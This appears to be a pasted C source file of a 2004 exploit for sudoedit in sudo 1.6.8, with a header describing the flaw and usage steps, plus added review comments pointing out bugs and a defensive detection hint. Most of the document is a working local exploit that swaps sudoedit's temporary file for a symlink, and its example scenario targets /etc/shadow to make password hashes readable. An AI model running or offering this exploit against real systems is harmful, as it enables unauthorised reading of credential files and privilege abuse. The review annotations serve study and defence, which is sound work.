cybercode

sudo_exploit.c

Feb 17th, 2012
  1. /*
  2.  
  3.            Copyright © Rosiello Security 2004
  4.                 http://www.rosiello.org
  5.  
  6.                   sudoedit Exploit
  7.  
  8.  
  9. SOFTWARE : sudoedit
  10. REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
  11. DATE: 18/09/2004
  12.  
  13. Summary:
  14. A flaw exists in sudo's -e option (aka sudoedit)
  15. in sudo version 1.6.8 that can give an attacker
  16. read permission to a file that would otherwise be
  17. unreadable.
  18.  
  19. Sudo versions affected:
  20. 1.6.8 only
  21.  
  22. Credit:
  23. Reznic Valery discovered the problem.
  24.  
  25. -----------------------------------------------------------
  26.  
  27. All the information that you can find in this software
  28. is published for educational and didactic purposes only.
  29. The author publishes this program on the condition
  30. that the reader does not intend to use it
  31. to bring himself or others a profit, or to cause
  32. damage to others.
  33.  
  34. !Respect the law!
  35.  
  36. How do I use this code ?
  37.  
  38. To exploit sudoedit you have to open with it the
  39. file "rosiello" as shown in the example.
  40.  
  41. EXAMPLE SCENARIO:
  42.  
  43. 1) Open two shells (i) and (ii);
  44. 2) (i)$sudoedit rosiello;
  45. 3) (ii)$./sudoedit-exploit /etc/shadow;
  46. 4) (i) close sudoedit.
  47.  
  48. The file "rosiello" is now a copy of "/etc/shadow".
  49.  
  50. AUTHOR : Angelo Rosiello
  51. CONTACT: angelo@rosiello.org
  52.  
  53. */
  54.  
  55. #include <stdio.h>
  56. #include <sys/stat.h>
  57. #include <string.h>
  58. #include <sys/types.h>
  59. #include <fcntl.h>
  60. #include <stdio.h>
  61. #include <dirent.h>
  62.  
  63.  
  64. int main( int argc, char *argv[] )
  65. {
              /*
               * Scans PATH for a directory entry whose name contains "rosiello",
               * deletes it and puts a symbolic link to argv[1] in its place.
               * Per the header comment this targets the temporary copy that
               * sudoedit in sudo 1.6.8 keeps while "rosiello" is open; what
               * sudoedit does with the link afterwards is not shown in this file.
               * Every return statement returns 0, including the usage error and
               * the "nothing matched" case, so the exit status carries no signal.
               *
               * NOTE(review): the file never includes <unistd.h> or <sys/wait.h>,
               * so fork(), execl() and wait() are used without prototypes.
               * NOTE(review, defensive): the visible precondition is a predictably
               * named temp file in a directory the caller may modify; a symlink
               * there whose name contains the edited file's name and which points
               * at a protected file is the artefact to look for.
               */
  66.         char PATH[]="/usr/tmp";
              /* NOTE(review): 32 bytes is too small for the longest name accepted
               * below: "/usr/tmp" (8) + "/" (1) + 24 + NUL = 34. */
  67.         char file[32];
  68.         DIR *tmp;
  69.         struct dirent *de;
              /* NOTE(review): the directory is opened before argc is validated and
               * the result is never checked; a NULL here reaches readdir(). */
  70.         tmp = opendir ( PATH );
  71.         int found = 0;
  72.  
  73.         printf( "Copyright ?? Rosiello Security 2004\n" );
  74.         printf( "http://www.rosiello.org\n" );
  75.  
              /* Exactly one argument is required: the path the link will point to. */
  76.         if( argc!=2 )
  77.         {
  78.                 printf( "USAGE: %s file\n", argv[0] );
                      /* NOTE(review): returns without closedir( tmp ). */
  79.                 return( 0 );
  80.         }
  81.  
  82.  
              /* Walk the directory; only the first matching entry is processed. */
  83.         while ( (de = readdir ( tmp ))!= NULL )
  84.         {
                      /* Substring match: any entry containing "rosiello" qualifies,
                       * not only a file created by sudoedit. */
  85.                 if ( (strstr(de->d_name, "rosiello") != NULL) )
  86.                 {
                              /* Length guard for file[]; names of 23 or 24 characters
                               * pass it and still overflow the buffer in sprintf().
                               * NOTE(review): this early return also skips closedir(). */
  87.                         if( strlen(de->d_name) > 24 ) return( 0 );
  88.                         sprintf( file, "%s/%s", PATH, (char *)de->d_name );
                              /* Delete the existing entry so the name is free for the
                               * link; the return value is not checked. */
  89.                         remove( file );
                              /* fork() is non-zero in the parent (and -1 on failure), so
                               * it is the parent that is replaced by /bin/ln; the child,
                               * where fork() returned 0, continues below. */
  90.                         if( fork()!=0 )
  91.                         {
  92.                                 execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );
  93.                         }
                              /* NOTE(review): wait() is called with no argument and, on
                               * the normal path, from the child, which has no children
                               * to wait for. The message below can therefore be printed
                               * before ln has created the link. */
  94.                         wait( );
  95.                         printf( "Now you can close sudoedit and reopen rosiello!\n" );
  96.                         found=1;
  97.                         goto end;
  98.  
  99.                 }
  100.  
  101.         }
               /* Common exit: reached via the goto above or when the scan ends. */
  102.         end:
  103.         closedir( tmp );
  104.  
  105.         if( !found )
  106.                 printf( "File Not Found!\n" );
  107.         return( 0 );
  108.  
  109. }